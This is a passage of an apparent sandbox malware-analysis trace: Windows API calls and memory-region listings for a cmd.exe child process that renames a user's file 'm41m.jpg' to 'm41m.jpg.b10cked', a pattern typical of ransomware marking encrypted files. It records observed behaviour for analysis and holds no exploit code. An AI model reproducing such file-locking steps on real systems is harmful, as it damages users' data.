_get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f4e8*, lpNumberOfBytesWritten=0x18e4ec*=0x20, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.310] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.310] ReadFile (in: hFile=0x54, lpBuffer=0x18f308, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4f8, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesRead=0x18e4f8*=0x32, lpOverlapped=0x0) returned 1 [0142.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.310] GetFileType (hFile=0x4c) returned 0x1 [0142.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.311] GetFileType (hFile=0x4c) returned 0x1 [0142.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18f308*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f308*, lpNumberOfBytesWritten=0x18e4ec*=0x32, lpOverlapped=0x0) returned 1 [0142.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.311] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4d8 | out: lpNewFilePointer=0x0) returned 1 [0142.311] _close (_FileHandle=4) returned 0 [0142.311] FindNextFileW (in: hFindFile=0x230ea0, lpFindFileData=0x18f56c | out: lpFindFileData=0x18f56c) returned 0 [0142.312] GetLastError () returned 0x12 [0142.312] FindClose (in: hFindFile=0x230ea0 | out: hFindFile=0x230ea0) returned 1 [0142.312] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.312] _close (_FileHandle=3) returned 0 [0142.312] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.312] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.313] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.313] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.313] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.313] SetConsoleInputExeNameW () returned 0x1 [0142.313] GetConsoleOutputCP () returned 0x1b5 [0142.313] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.313] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.313] exit (_Code=0) Process: id = "178" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e40" os_pid = "0xf28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15120 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15121 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15122 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15123 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 15124 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15125 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15126 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15128 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 15129 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16094 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16095 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16096 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16097 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 16098 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 16099 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16100 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16101 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16102 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16106 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16107 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16108 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 16109 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16110 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16111 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16112 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16113 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16114 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16115 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 16116 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 16117 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 235 os_tid = 0xf2c [0141.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8cc | out: lpSystemTimeAsFileTime=0x20f8cc*(dwLowDateTime=0x8e700640, dwHighDateTime=0x1d440a9)) [0141.774] GetCurrentProcessId () returned 0xf28 [0141.774] GetCurrentThreadId () returned 0xf2c [0141.774] GetTickCount () returned 0x2c6b7 [0141.774] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8c4 | out: lpPerformanceCount=0x20f8c4*=19856356609) returned 1 [0141.775] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.775] __set_app_type (_Type=0x1) [0141.775] __p__fmode () returned 0x76b331f4 [0141.775] __p__commode () returned 0x76b331fc [0141.775] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.775] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.775] GetCurrentThreadId () returned 0xf2c [0141.775] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf2c) returned 0x38 [0141.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.776] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.776] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.776] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.776] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f85c | out: phkResult=0x20f85c*=0x0) returned 0x2 [0141.776] VirtualQuery (in: lpAddress=0x20f893, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.776] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f82c, dwLength=0x1c | out: lpBuffer=0x20f82c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.776] GetConsoleOutputCP () returned 0x1b5 [0141.776] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.776] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.776] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.777] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.777] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.777] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.777] GetEnvironmentStringsW () returned 0x230150* [0141.777] FreeEnvironmentStringsW (penv=0x230150) returned 1 [0141.777] GetEnvironmentStringsW () returned 0x230150* [0141.778] FreeEnvironmentStringsW (penv=0x230150) returned 1 [0141.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7cc | out: phkResult=0x20e7cc*=0x40) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegCloseKey (hKey=0x40) returned 0x0 [0141.778] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e7cc | out: phkResult=0x20e7cc*=0x40) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x40, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x1, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x0, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x4, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x4) returned 0x0 [0141.778] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e7d4, lpData=0x20e7d8, lpcbData=0x20e7d0*=0x1000 | out: lpType=0x20e7d4*=0x0, lpData=0x20e7d8*=0x9, lpcbData=0x20e7d0*=0x1000) returned 0x2 [0141.778] RegCloseKey (hKey=0x40) returned 0x0 [0141.778] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.778] srand (_Seed=0x5b886370) [0141.778] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" [0141.778] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"" [0141.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.779] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2318b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.779] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.779] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.779] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.779] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.779] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.779] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.779] GetEnvironmentStringsW () returned 0x2322a0* [0141.779] FreeEnvironmentStringsW (penv=0x2322a0) returned 1 [0141.779] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.779] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.779] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.779] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.779] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.779] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.779] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.780] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.780] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f598, lpFilePart=0x20f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f594*="Desktop") returned 0x18 [0141.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.780] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f314 | out: lpFindFileData=0x20f314) returned 0x22ffe0 [0141.780] FindClose (in: hFindFile=0x22ffe0 | out: hFindFile=0x22ffe0) returned 1 [0141.780] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.780] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.780] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.780] GetEnvironmentStringsW () returned 0x232ac0* [0141.781] FreeEnvironmentStringsW (penv=0x232ac0) returned 1 [0141.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.781] GetConsoleOutputCP () returned 0x1b5 [0141.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.781] GetUserDefaultLCID () returned 0x409 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6d8, cchData=128 | out: lpLCData="1") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.782] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.783] GetConsoleTitleW (in: lpConsoleTitle=0x2208b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.783] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.783] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.784] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.784] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.784] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.784] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.784] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.784] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.784] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.786] GetConsoleTitleW (in: lpConsoleTitle=0x20f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.786] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.786] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.786] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.787] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.787] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.787] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.787] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.787] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.787] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.787] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.787] _wcsicmp 